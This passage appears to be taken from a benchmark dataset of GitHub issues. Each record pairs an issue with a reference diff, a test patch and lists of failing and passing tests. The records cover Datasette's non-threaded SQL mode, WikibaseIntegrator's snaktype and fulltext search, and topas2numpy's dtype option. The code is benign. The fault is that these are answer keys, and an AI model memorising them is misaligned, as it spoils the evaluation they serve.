"bpython/test/test_manual_readline.py::TestEdits::test_functions_with_bad_signatures",
"bpython/test/test_manual_readline.py::TestEdits::test_seq"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-07-08 14:48:58+00:00
|
mit
| 1,426
|
|
simonw__datasette-1736
|
diff --git a/datasette/app.py b/datasette/app.py
index a5330458..b7b84371 100644
--- a/datasette/app.py
+++ b/datasette/app.py
@@ -288,9 +288,12 @@ class Datasette:
self._settings = dict(DEFAULT_SETTINGS, **(settings or {}))
self.renderers = {} # File extension -> (renderer, can_render) functions
self.version_note = version_note
- self.executor = futures.ThreadPoolExecutor(
- max_workers=self.setting("num_sql_threads")
- )
+ if self.setting("num_sql_threads") == 0:
+ self.executor = None
+ else:
+ self.executor = futures.ThreadPoolExecutor(
+ max_workers=self.setting("num_sql_threads")
+ )
self.max_returned_rows = self.setting("max_returned_rows")
self.sql_time_limit_ms = self.setting("sql_time_limit_ms")
self.page_size = self.setting("default_page_size")
@@ -862,6 +865,8 @@ class Datasette:
]
def _threads(self):
+ if self.setting("num_sql_threads") == 0:
+ return {"num_threads": 0, "threads": []}
threads = list(threading.enumerate())
d = {
"num_threads": len(threads),
diff --git a/datasette/database.py b/datasette/database.py
index ba594a8c..44d32667 100644
--- a/datasette/database.py
+++ b/datasette/database.py
@@ -45,6 +45,9 @@ class Database:
self._cached_table_counts = None
self._write_thread = None
self._write_queue = None
+ # These are used when in non-threaded mode:
+ self._read_connection = None
+ self._write_connection = None
if not self.is_mutable and not self.is_memory:
p = Path(path)
self.hash = inspect_hash(p)
@@ -134,6 +137,14 @@ class Database:
return results
async def execute_write_fn(self, fn, block=True):
+ if self.ds.executor is None:
+ # non-threaded mode
+ if self._write_connection is None:
+ self._write_connection = self.connect(write=True)
+ self.ds._prepare_connection(self._write_connection, self.name)
+ return fn(self._write_connection)
+
+ # threaded mode
task_id = uuid.uuid5(uuid.NAMESPACE_DNS, "datasette.io")
if self._write_queue is None:
self._write_queue = queue.Queue()
@@ -177,6 +188,14 @@ class Database:
task.reply_queue.sync_q.put(result)
async def execute_fn(self, fn):
+ if self.ds.executor is None:
+ # non-threaded mode
+ if self._read_connection is None:
+ self._read_connection = self.connect()
+ self.ds._prepare_connection(self._read_connection, self.name)
+ return fn(self._read_connection)
+
+ # threaded mode
def in_thread():
conn = getattr(connections, self.name, None)
if not conn:
diff --git a/docs/settings.rst b/docs/settings.rst
index 60c4b36d..8437fb04 100644
--- a/docs/settings.rst
+++ b/docs/settings.rst
@@ -107,6 +107,8 @@ Maximum number of threads in the thread pool Datasette uses to execute SQLite qu
datasette mydatabase.db --setting num_sql_threads 10
+Setting this to 0 turns off threaded SQL queries entirely - useful for environments that do not support threading such as `Pyodide <https://pyodide.org/>`__.
+
.. _setting_allow_facet:
allow_facet
|
simonw/datasette
|
a29c1277896b6a7905ef5441c42a37bc15f67599
|
diff --git a/tests/test_internals_datasette.py b/tests/test_internals_datasette.py
index cc200a2d..1dc14cab 100644
--- a/tests/test_internals_datasette.py
+++ b/tests/test_internals_datasette.py
@@ -1,7 +1,7 @@
"""
Tests for the datasette.app.Datasette class
"""
-from datasette.app import Datasette
+from datasette.app import Datasette, Database
from itsdangerous import BadSignature
from .fixtures import app_client
import pytest
@@ -63,3 +63,15 @@ async def test_datasette_constructor():
"hash": None,
}
]
+
+
+@pytest.mark.asyncio
+async def test_num_sql_threads_zero():
+ ds = Datasette([], memory=True, settings={"num_sql_threads": 0})
+ db = ds.add_database(Database(ds, memory_name="test_num_sql_threads_zero"))
+ await db.execute_write("create table t(id integer primary key)")
+ await db.execute_write("insert into t (id) values (1)")
+ response = await ds.client.get("/-/threads.json")
+ assert response.json() == {"num_threads": 0, "threads": []}
+ response2 = await ds.client.get("/test_num_sql_threads_zero/t.json?_shape=array")
+ assert response2.json() == [{"id": 1}]
|
Datasette setting to disable threading (for Pyodide)
> I'm going to add a Datasette setting to disable threading entirely, designed for usage in this particular case.
>
> I thought about adding a new setting, then I noticed this:
>
> datasette mydatabase.db --setting num_sql_threads 10
>
> I'm going to let users set that to `0` to disable threaded execution of SQL queries.
_Originally posted by @simonw in https://github.com/simonw/datasette/issues/1733#issuecomment-1115278325_
|
0.0
|
a29c1277896b6a7905ef5441c42a37bc15f67599
|
[
"tests/test_internals_datasette.py::test_num_sql_threads_zero"
] |
[
"tests/test_internals_datasette.py::test_get_database",
"tests/test_internals_datasette.py::test_get_database_no_argument",
"tests/test_internals_datasette.py::test_sign_unsign[None-hello]",
"tests/test_internals_datasette.py::test_sign_unsign[None-123]",
"tests/test_internals_datasette.py::test_sign_unsign[None-value2]",
"tests/test_internals_datasette.py::test_sign_unsign[two-hello]",
"tests/test_internals_datasette.py::test_sign_unsign[two-123]",
"tests/test_internals_datasette.py::test_sign_unsign[two-value2]",
"tests/test_internals_datasette.py::test_datasette_setting[base_url-/]",
"tests/test_internals_datasette.py::test_datasette_setting[max_csv_mb-100]",
"tests/test_internals_datasette.py::test_datasette_setting[allow_csv_stream-True]",
"tests/test_internals_datasette.py::test_datasette_constructor"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-05-02 20:14:38+00:00
|
apache-2.0
| 5,498
|
|
LeMyst__WikibaseIntegrator-420
|
diff --git a/notebooks/item_create_new.ipynb b/notebooks/item_create_new.ipynb
index d498f68..7ad47bd 100644
--- a/notebooks/item_create_new.ipynb
+++ b/notebooks/item_create_new.ipynb
@@ -35,12 +35,12 @@
},
"outputs": [],
"source": [
- "from wikibaseintegrator.models import Qualifiers, References, Reference\n",
- "\n",
- "from wikibaseintegrator import WikibaseIntegrator\n",
- "from wikibaseintegrator import wbi_login\n",
"from wikibaseintegrator import datatypes\n",
- "from wikibaseintegrator.wbi_config import config"
+ "from wikibaseintegrator import wbi_login\n",
+ "from wikibaseintegrator import WikibaseIntegrator\n",
+ "from wikibaseintegrator.models import Qualifiers, Reference, References\n",
+ "from wikibaseintegrator.wbi_config import config\n",
+ "from wikibaseintegrator.wbi_enums import WikibaseRank, WikibaseSnakType"
]
},
{
@@ -162,7 +162,7 @@
"outputs": [
{
"data": {
- "text/plain": "<LanguageValue @ed5b70 _LanguageValue__language='fr' _LanguageValue__value='Nouvel élément' _LanguageValue__removed=False>"
+ "text/plain": "<LanguageValue @8e3ca0 _LanguageValue__language='fr' _LanguageValue__value='Nouvel élément' _LanguageValue__removed=False>"
},
"execution_count": 6,
"metadata": {},
@@ -198,7 +198,7 @@
"outputs": [
{
"data": {
- "text/plain": "<Aliases @ed4880 _Aliases__aliases={'en': [<Alias @ed56c0 _LanguageValue__language='en' _LanguageValue__value='Item' _LanguageValue__removed=False>], 'fr': [<Alias @ed5ae0 _LanguageValue__language='fr' _LanguageValue__value='Élément' _LanguageValue__removed=False>]}>"
+ "text/plain": "<Aliases @c234c0 _Aliases__aliases={'en': [<Alias @c5ce50 _LanguageValue__language='en' _LanguageValue__value='Item' _LanguageValue__removed=False>], 'fr': [<Alias @c5cca0 _LanguageValue__language='fr' _LanguageValue__value='Élément' _LanguageValue__removed=False>]}>"
},
"execution_count": 7,
"metadata": {},
@@ -234,7 +234,7 @@
"outputs": [
{
"data": {
- "text/plain": "<LanguageValue @ed5750 _LanguageValue__language='fr' _LanguageValue__value='Un élément fraichement créé' _LanguageValue__removed=False>"
+ "text/plain": "<LanguageValue @c5d240 _LanguageValue__language='fr' _LanguageValue__value='Un élément fraichement créé' _LanguageValue__removed=False>"
},
"execution_count": 8,
"metadata": {},
@@ -270,7 +270,7 @@
"outputs": [
{
"data": {
- "text/plain": "<Claims @ed4460 _Claims__claims={'P31533': [<String @ed5ab0 _Claim__mainsnak=<Snak @ed6920 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P31533' _Snak__hash=None _Snak__datavalue={'value': 'A String property', 'type': 'string'} _Snak__datatype='string'> _Claim__type='statement' _Claim__qualifiers=<Qualifiers @ed7370 _Qualifiers__qualifiers={'P828': [<Snak @ed6980 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash=None _Snak__datavalue={'value': 'Item qualifier', 'type': 'string'} _Snak__datatype='string'>]}> _Claim__qualifiers_order=[] _Claim__id=None _Claim__rank=<WikibaseRank.NORMAL: 'normal'> _Claim__removed=False _Claim__references=<References @ed5ff0 _References__references=[<Reference @ed6260 _Reference__hash=None _Reference__snaks=<Snaks @ed68c0 snaks={'P828': [<Snak @ed6aa0 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash=None _Snak__datavalue={'value': 'Item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=[]>, <Reference @ed69e0 _Reference__hash=None _Reference__snaks=<Snaks @ed6950 snaks={'P828': [<Snak @ed7c40 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash=None _Snak__datavalue={'value': 'Another item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=[]>]>>]}>"
+ "text/plain": "<Claims @c233a0 _Claims__claims={'P31533': [<String @c5e0b0 _Claim__mainsnak=<Snak @c5f700 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P31533' _Snak__hash=None _Snak__datavalue={'value': 'A String property', 'type': 'string'} _Snak__datatype='string'> _Claim__type='statement' _Claim__qualifiers=<Qualifiers @c5f820 _Qualifiers__qualifiers={'P828': [<Snak @c5dc00 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash=None _Snak__datavalue={'value': 'Item qualifier', 'type': 'string'} _Snak__datatype='string'>]}> _Claim__qualifiers_order=[] _Claim__id=None _Claim__rank=<WikibaseRank.PREFERRED: 'preferred'> _Claim__removed=False _Claim__references=<References @c5e140 _References__references=[<Reference @c5fa00 _Reference__hash=None _Reference__snaks=<Snaks @c5da50 snaks={'P828': [<Snak @c5dd20 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash=None _Snak__datavalue={'value': 'Item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=[]>, <Reference @c5dc60 _Reference__hash=None _Reference__snaks=<Snaks @c5dbd0 snaks={'P828': [<Snak @c5f5b0 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash=None _Snak__datavalue={'value': 'Another item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=[]>, <Reference @c5e0e0 _Reference__hash=None _Reference__snaks=<Snaks @c5dba0 snaks={'P828': [<Snak @c5f730 _Snak__snaktype=<WikibaseSnakType.NO_VALUE: 'novalue'> _Snak__property_number='P828' _Snak__hash=None _Snak__datavalue={} _Snak__datatype='string'>]}> _Reference__snaks_order=[]>]>>], 'P3133': [<String @c5f580 _Claim__mainsnak=<Snak @c5f6d0 _Snak__snaktype=<WikibaseSnakType.UNKNOWN_VALUE: 'somevalue'> _Snak__property_number='P3133' _Snak__hash=None _Snak__datavalue={} _Snak__datatype='string'> _Claim__type='statement' _Claim__qualifiers=<Qualifiers @c5f610 _Qualifiers__qualifiers={}> _Claim__qualifiers_order=[] _Claim__id=None _Claim__rank=<WikibaseRank.NORMAL: 'normal'> _Claim__removed=False _Claim__references=<References @c5f7c0 _References__references=[]>>]}>"
},
"execution_count": 9,
"metadata": {},
@@ -282,18 +282,34 @@
"new_qualifiers.add(datatypes.String(prop_nr='P828', value='Item qualifier'))\n",
"\n",
"new_references = References()\n",
+ "\n",
+ "# Create a first reference\n",
"new_reference1 = Reference()\n",
"new_reference1.add(datatypes.String(prop_nr='P828', value='Item string reference'))\n",
"\n",
+ "# Create another reference\n",
"new_reference2 = Reference()\n",
"new_reference2.add(datatypes.String(prop_nr='P828', value='Another item string reference'))\n",
"\n",
+ "# Create a reference with \"no value\"\n",
+ "new_reference3 = Reference()\n",
+ "new_reference3.add(datatypes.String(prop_nr='P828', snaktype=WikibaseSnakType.NO_VALUE))\n",
+ "\n",
+ "# Add all the references to the References object\n",
"new_references.add(new_reference1)\n",
"new_references.add(new_reference2)\n",
+ "new_references.add(new_reference3)\n",
+ "\n",
+ "# Create the claim with the qualifiers and refererences. Set rank as 'preferred'.\n",
+ "new_claim = datatypes.String(prop_nr='P31533', value='A String property', qualifiers=new_qualifiers,\n",
+ " references=new_references, rank=WikibaseRank.PREFERRED)\n",
+ "\n",
+ "new_item.claims.add(new_claim)\n",
"\n",
- "new_claim = datatypes.String(prop_nr='P31533', value='A String property', qualifiers=new_qualifiers, references=new_references)\n",
+ "# Create a claim with an unknown value\n",
+ "unknown_claim = datatypes.String(prop_nr='P3133', snaktype=WikibaseSnakType.UNKNOWN_VALUE)\n",
"\n",
- "new_item.claims.add(new_claim)"
+ "new_item.claims.add(unknown_claim)"
]
},
{
@@ -320,7 +336,7 @@
"outputs": [
{
"data": {
- "text/plain": "<ItemEntity @ed4640 _BaseEntity__api=<wikibaseintegrator.wikibaseintegrator.WikibaseIntegrator object at 0x000001D8C4ED42E0>\n\t _BaseEntity__title=None\n\t _BaseEntity__pageid=None\n\t _BaseEntity__lastrevid=579081\n\t _BaseEntity__type='item'\n\t _BaseEntity__id='Q225256'\n\t _BaseEntity__claims=<Claims @ed79a0 _Claims__claims={'P31533': [<String @ed7550 _Claim__mainsnak=<Snak @ed7160 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P31533' _Snak__hash='112d32b098a091cc1398c779e76c763a523d4ffc' _Snak__datavalue={'value': 'A String property', 'type': 'string'} _Snak__datatype='string'> _Claim__type='statement' _Claim__qualifiers=<Qualifiers @ed6fb0 _Qualifiers__qualifiers={'P828': [<Snak @ed71c0 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash='8d721edd0365e35ed006822601a4837b35e68fd6' _Snak__datavalue={'value': 'Item qualifier', 'type': 'string'} _Snak__datatype='string'>]}> _Claim__qualifiers_order=['P828'] _Claim__id='Q225256$A1CB5069-5FF4-4EE4-BE99-D1607BFFB705' _Claim__rank=<WikibaseRank.NORMAL: 'normal'> _Claim__removed=False _Claim__references=<References @ed7010 _References__references=[<Reference @ed75b0 _Reference__hash='9820f3e32182f8b5575be8b9cf55b9c7e5fbf269' _Reference__snaks=<Snaks @ed6f20 snaks={'P828': [<Snak @ed7220 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash='811577f0f42a7059f39bd6b169366bb1fb2f9af3' _Snak__datavalue={'value': 'Item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=['P828']>, <Reference @ed76a0 _Reference__hash='0d2ff45b3eace5dd184ad5f4ac0d1c6eff35e4ac' _Reference__snaks=<Snaks @ed7490 snaks={'P828': [<Snak @ed7580 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash='774c2b3d70f072fb26d05a95d24445fbc8b2534e' _Snak__datavalue={'value': 'Another item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=['P828']>]>>]}>\n\t _ItemEntity__labels=<Labels @ed74f0 _LanguageValues__values={'en': <LanguageValue @ed7130 _LanguageValue__language='en' _LanguageValue__value='New item' _LanguageValue__removed=False>, 'fr': <LanguageValue @ed7190 _LanguageValue__language='fr' _LanguageValue__value='Nouvel élément' _LanguageValue__removed=False>}>\n\t _ItemEntity__descriptions=<Descriptions @ed4280 _LanguageValues__values={'en': <LanguageValue @ed54e0 _LanguageValue__language='en' _LanguageValue__value='A freshly created element' _LanguageValue__removed=False>, 'fr': <LanguageValue @ed7040 _LanguageValue__language='fr' _LanguageValue__value='Un élément fraichement créé' _LanguageValue__removed=False>}>\n\t _ItemEntity__aliases=<Aliases @ed4760 _Aliases__aliases={'en': [<Alias @ed6e60 _LanguageValue__language='en' _LanguageValue__value='Item' _LanguageValue__removed=False>], 'fr': [<Alias @ed76d0 _LanguageValue__language='fr' _LanguageValue__value='Élément' _LanguageValue__removed=False>]}>\n\t _ItemEntity__sitelinks=<Sitelinks @ed6350 sitelinks={}>>"
+ "text/plain": "<ItemEntity @c23520 _BaseEntity__api=<wikibaseintegrator.wikibaseintegrator.WikibaseIntegrator object at 0x0000024546C23400>\n\t _BaseEntity__title=None\n\t _BaseEntity__pageid=None\n\t _BaseEntity__lastrevid=598021\n\t _BaseEntity__type='item'\n\t _BaseEntity__id='Q226304'\n\t _BaseEntity__claims=<Claims @c5f0d0 _Claims__claims={'P31533': [<String @c5fee0 _Claim__mainsnak=<Snak @c5fe20 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P31533' _Snak__hash='112d32b098a091cc1398c779e76c763a523d4ffc' _Snak__datavalue={'value': 'A String property', 'type': 'string'} _Snak__datatype='string'> _Claim__type='statement' _Claim__qualifiers=<Qualifiers @c5ef80 _Qualifiers__qualifiers={'P828': [<Snak @c5fca0 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash='8d721edd0365e35ed006822601a4837b35e68fd6' _Snak__datavalue={'value': 'Item qualifier', 'type': 'string'} _Snak__datatype='string'>]}> _Claim__qualifiers_order=['P828'] _Claim__id='Q226304$C318B066-FD5E-4766-BD03-5F881145511A' _Claim__rank=<WikibaseRank.PREFERRED: 'preferred'> _Claim__removed=False _Claim__references=<References @c5efb0 _References__references=[<Reference @c5d900 _Reference__hash='9820f3e32182f8b5575be8b9cf55b9c7e5fbf269' _Reference__snaks=<Snaks @c5fd30 snaks={'P828': [<Snak @c5d720 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash='811577f0f42a7059f39bd6b169366bb1fb2f9af3' _Snak__datavalue={'value': 'Item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=['P828']>, <Reference @c5f340 _Reference__hash='0d2ff45b3eace5dd184ad5f4ac0d1c6eff35e4ac' _Reference__snaks=<Snaks @c5f280 snaks={'P828': [<Snak @c5d3f0 _Snak__snaktype=<WikibaseSnakType.KNOWN_VALUE: 'value'> _Snak__property_number='P828' _Snak__hash='774c2b3d70f072fb26d05a95d24445fbc8b2534e' _Snak__datavalue={'value': 'Another item string reference', 'type': 'string'} _Snak__datatype='string'>]}> _Reference__snaks_order=['P828']>, <Reference @c5e290 _Reference__hash='4968e32f26488317c52a8883b49cb160b39e3428' _Reference__snaks=<Snaks @c5ffd0 snaks={'P828': [<Snak @c5c7c0 _Snak__snaktype=<WikibaseSnakType.NO_VALUE: 'novalue'> _Snak__property_number='P828' _Snak__hash='6e63dffef5a685b86c63dafda7a4748cbe8b029e' _Snak__datavalue={} _Snak__datatype='string'>]}> _Reference__snaks_order=['P828']>]>>], 'P3133': [<MonolingualText @c5f520 _Claim__mainsnak=<Snak @c5d060 _Snak__snaktype=<WikibaseSnakType.UNKNOWN_VALUE: 'somevalue'> _Snak__property_number='P3133' _Snak__hash='4b66bd689df0c4cd59c2df014b4e6a97ee99240d' _Snak__datavalue={} _Snak__datatype='monolingualtext'> _Claim__type='statement' _Claim__qualifiers=<Qualifiers @c5ef50 _Qualifiers__qualifiers={}> _Claim__qualifiers_order=[] _Claim__id='Q226304$7B072F85-CDB5-4F8D-9F34-ABDE829581FC' _Claim__rank=<WikibaseRank.NORMAL: 'normal'> _Claim__removed=False _Claim__references=<References @c5feb0 _References__references=[]>>]}>\n\t _ItemEntity__labels=<Labels @c5ff10 _LanguageValues__values={'en': <LanguageValue @c5fdf0 _LanguageValue__language='en' _LanguageValue__value='New item' _LanguageValue__removed=False>, 'fr': <LanguageValue @c5c5b0 _LanguageValue__language='fr' _LanguageValue__value='Nouvel élément' _LanguageValue__removed=False>}>\n\t _ItemEntity__descriptions=<Descriptions @c234f0 _LanguageValues__values={'en': <LanguageValue @c5cfd0 _LanguageValue__language='en' _LanguageValue__value='A freshly created element' _LanguageValue__removed=False>, 'fr': <LanguageValue @c5eda0 _LanguageValue__language='fr' _LanguageValue__value='Un élément fraichement créé' _LanguageValue__removed=False>}>\n\t _ItemEntity__aliases=<Aliases @c23550 _Aliases__aliases={'en': [<Alias @c5ef20 _LanguageValue__language='en' _LanguageValue__value='Item' _LanguageValue__removed=False>], 'fr': [<Alias @c5ed10 _LanguageValue__language='fr' _LanguageValue__value='Élément' _LanguageValue__removed=False>]}>\n\t _ItemEntity__sitelinks=<Sitelinks @c5d2a0 sitelinks={}>>"
},
"execution_count": 10,
"metadata": {},
diff --git a/wikibaseintegrator/models/claims.py b/wikibaseintegrator/models/claims.py
index 641ae1e..8a64564 100644
--- a/wikibaseintegrator/models/claims.py
+++ b/wikibaseintegrator/models/claims.py
@@ -8,7 +8,7 @@ from wikibaseintegrator.models.basemodel import BaseModel
from wikibaseintegrator.models.qualifiers import Qualifiers
from wikibaseintegrator.models.references import Reference, References
from wikibaseintegrator.models.snaks import Snak, Snaks
-from wikibaseintegrator.wbi_enums import ActionIfExists, WikibaseRank
+from wikibaseintegrator.wbi_enums import ActionIfExists, WikibaseRank, WikibaseSnakType
class Claims(BaseModel):
@@ -131,14 +131,15 @@ class Claims(BaseModel):
class Claim(BaseModel):
DTYPE = 'claim'
- def __init__(self, qualifiers: Optional[Qualifiers] = None, rank: Optional[WikibaseRank] = None, references: Optional[Union[References, List[Union[Claim, List[Claim]]]]] = None) -> None:
+ def __init__(self, qualifiers: Optional[Qualifiers] = None, rank: Optional[WikibaseRank] = None, references: Optional[Union[References, List[Union[Claim, List[Claim]]]]] = None, snaktype: WikibaseSnakType = WikibaseSnakType.KNOWN_VALUE) -> None:
"""
:param qualifiers:
:param rank:
:param references: A References object, a list of Claim object or a list of list of Claim object
+ :param snaktype:
"""
- self.mainsnak = Snak(datatype=self.DTYPE)
+ self.mainsnak = Snak(datatype=self.DTYPE, snaktype=snaktype)
self.type = 'statement'
self.qualifiers = qualifiers or Qualifiers()
self.qualifiers_order = []
diff --git a/wikibaseintegrator/models/snaks.py b/wikibaseintegrator/models/snaks.py
index 3d5f207..0388b7a 100644
--- a/wikibaseintegrator/models/snaks.py
+++ b/wikibaseintegrator/models/snaks.py
@@ -100,7 +100,7 @@ class Snak(BaseModel):
@datavalue.setter
def datavalue(self, value):
- if value is not None:
+ if value is not None and value != {}:
self.snaktype = WikibaseSnakType.KNOWN_VALUE
self.__datavalue = value
diff --git a/wikibaseintegrator/wbi_helpers.py b/wikibaseintegrator/wbi_helpers.py
index 107e274..2c539b9 100644
--- a/wikibaseintegrator/wbi_helpers.py
+++ b/wikibaseintegrator/wbi_helpers.py
@@ -472,6 +472,28 @@ def search_entities(search_string: str, language: Optional[str] = None, strict_l
return results
+def fulltext_search(search: str, max_results: int = 50, allow_anonymous: bool = True, **kwargs: Any) -> List[Dict[str, Any]]:
+ """
+ Perform a fulltext search on the mediawiki instance.
+ It's an exception to the "only wikibase related function" rule! WikibaseIntegrator is focused on wikibase-only functions to avoid spreading out and covering all functions of MediaWiki.
+
+ :param search: Search for page titles or content matching this value. You can use the search string to invoke special search features, depending on what the wiki's search backend implements.
+ :param max_results: How many total pages to return. The value must be between 1 and 500.
+ :param allow_anonymous: Allow anonymous interaction with the MediaWiki API. 'True' by default.
+ :param kwargs: Extra parameters for mediawiki_api_call_helper()
+ :return:
+ """
+ params = {
+ 'action': 'query',
+ 'list': 'search',
+ 'srsearch': search,
+ 'srlimit': max_results,
+ 'format': 'json'
+ }
+
+ return mediawiki_api_call_helper(data=params, allow_anonymous=allow_anonymous, **kwargs)['query']['search']
+
+
def generate_entity_instances(entities: Union[str, List[str]], allow_anonymous: bool = True, **kwargs: Any) -> List[Tuple[str, BaseEntity]]:
"""
A method which allows for retrieval of a list of Wikidata entities. The method generates a list of tuples where the first value in the tuple is the entity's ID, whereas the
|
LeMyst/WikibaseIntegrator
|
50dc26d6396c65162027cd6f82fe07e8437fca09
|
diff --git a/test/test_wbi_core.py b/test/test_wbi_core.py
index 4bb3941..74d4e9a 100644
--- a/test/test_wbi_core.py
+++ b/test/test_wbi_core.py
@@ -210,6 +210,9 @@ class TestWbiCore(unittest.TestCase):
with self.assertRaises(ValueError):
t4.mainsnak.snaktype = 'invalid_value'
+ t5 = String(prop_nr='P1', snaktype=WikibaseSnakType.NO_VALUE)
+ assert t5.mainsnak.get_json()['snaktype'] == WikibaseSnakType.NO_VALUE.value
+
def test_new_item_creation(self):
data = [
String(value='test1', prop_nr='P1'),
|
Feature request: Add helper method for snaktype
As a user I want to indicate directly when instantiating a claim that it has no-value or unknown-value.
|
0.0
|
50dc26d6396c65162027cd6f82fe07e8437fca09
|
[
"test/test_wbi_core.py::TestWbiCore::test_snaktype"
] |
[
"test/test_wbi_core.py::TestWbiCore::test_basedatatype_action_if_exists",
"test/test_wbi_core.py::TestWbiCore::test_count_references",
"test/test_wbi_core.py::TestWbiCore::test_description",
"test/test_wbi_core.py::TestWbiCore::test_entity_generator",
"test/test_wbi_core.py::TestWbiCore::test_get",
"test/test_wbi_core.py::TestWbiCore::test_get_property_list",
"test/test_wbi_core.py::TestWbiCore::test_get_qualifier_properties",
"test/test_wbi_core.py::TestWbiCore::test_item_engine",
"test/test_wbi_core.py::TestWbiCore::test_label",
"test/test_wbi_core.py::TestWbiCore::test_new_extra_item_creation",
"test/test_wbi_core.py::TestWbiCore::test_new_item_creation",
"test/test_wbi_core.py::TestWbiCore::test_rank",
"test/test_wbi_core.py::TestWbiCore::test_wd_search"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-09-23 18:12:57+00:00
|
mit
| 320
|
|
davidchall__topas2numpy-13
|
diff --git a/topas2numpy/binned.py b/topas2numpy/binned.py
index dac1dfe..2b65a6d 100644
--- a/topas2numpy/binned.py
+++ b/topas2numpy/binned.py
@@ -47,15 +47,15 @@ class BinnedResult(object):
dimensions: list of BinnedDimension objects
data: dict of scored data
"""
- def __init__(self, filepath):
+ def __init__(self, filepath, dtype=float):
self.path = filepath
_, ext = os.path.splitext(self.path)
if ext == '.bin':
- self._read_binary()
+ self._read_binary(dtype)
elif ext == '.csv':
- self._read_ascii()
+ self._read_ascii(dtype)
- def _read_binary(self):
+ def _read_binary(self, dtype):
"""Reads data and metadata from binary format."""
# NOTE: binary files store binned data using Fortran-like ordering.
# Dimensions are iterated like z, y, x (so x changes fastest)
@@ -64,7 +64,7 @@ class BinnedResult(object):
with open(header_path) as f_header:
self._read_header(f_header.read())
- data = np.fromfile(self.path)
+ data = np.fromfile(self.path, dtype=dtype)
# separate data by statistic
data = data.reshape((len(self.statistics), -1), order='F')
@@ -76,7 +76,7 @@ class BinnedResult(object):
self.data = data
- def _read_ascii(self):
+ def _read_ascii(self, dtype):
"""Reads data and metadata from ASCII format."""
# NOTE: ascii files store binned data using C-like ordering.
# Dimensions are iterated like x, y, z (so z changes fastest)
@@ -88,7 +88,7 @@ class BinnedResult(object):
header_str += line
self._read_header(header_str)
- data = np.loadtxt(self.path, delimiter=',', unpack=True, ndmin=1)
+ data = np.loadtxt(self.path, dtype=dtype, delimiter=',', unpack=True, ndmin=1)
# separate data by statistic (neglecting bin columns when necessary)
n_dim = len(self.dimensions)
|
davidchall/topas2numpy
|
f20177d6930798e317033ab0e66117bb65ee08d6
|
diff --git a/tests/test_binned.py b/tests/test_binned.py
index 19e68b3..04e7a37 100644
--- a/tests/test_binned.py
+++ b/tests/test_binned.py
@@ -12,6 +12,9 @@ Tests for TOPAS binned reading.
import unittest
import os.path
+# third-party imports
+import numpy as np
+
# project imports
from topas2numpy import BinnedResult
@@ -55,6 +58,7 @@ class TestAscii1D(unittest.TestCase):
assert self.result.statistics[0] == 'Sum'
assert len(self.result.data) == 1
data = self.result.data['Sum']
+ assert data.dtype == np.float64
assert data.shape[0] == self.result.dimensions[0].n_bins
assert data.shape[1] == self.result.dimensions[1].n_bins
assert data.shape[2] == self.result.dimensions[2].n_bins
@@ -62,7 +66,7 @@ class TestAscii1D(unittest.TestCase):
class TestAscii2D(unittest.TestCase):
def setUp(self):
- self.result = BinnedResult(ascii_2d_path)
+ self.result = BinnedResult(ascii_2d_path, dtype=np.uint32)
def test_quantity(self):
assert self.result.quantity == 'SurfaceTrackCount'
@@ -88,6 +92,7 @@ class TestAscii2D(unittest.TestCase):
assert self.result.statistics[0] == 'Sum'
assert len(self.result.data) == 1
data = self.result.data['Sum']
+ assert data.dtype == np.uint32
assert data.shape[0] == self.result.dimensions[0].n_bins
assert data.shape[1] == self.result.dimensions[1].n_bins
assert data.shape[2] == self.result.dimensions[2].n_bins
|
Detect best NumPy dtype (use unsigned int for SurfaceTrackCount)
When the TOPAS scorer mode is set to 'SurfaceTrackCount' then the result is an integer. It would be best if the numpy dtype of the loaded data was set to an unsigned integer type in this case.
It seems this library loads such arrrays as 'float64' type which uses only 53 of the 64 bits to store the mantissa, meaning 11/64 bits are wasted in the case of 'SurfaceTrackCount', which unecessarily increases filesize.
It's also unexpected to receive a NumPy array of type 'float64' when the data consists of unsigned integers so this may have a usability impact also.
Is it possible to change this library so that it bases the data type whether the scorer is 'SurfaceTrackCount' or something else?
|
0.0
|
f20177d6930798e317033ab0e66117bb65ee08d6
|
[
"tests/test_binned.py::TestAscii2D::test_data",
"tests/test_binned.py::TestAscii2D::test_dimensions",
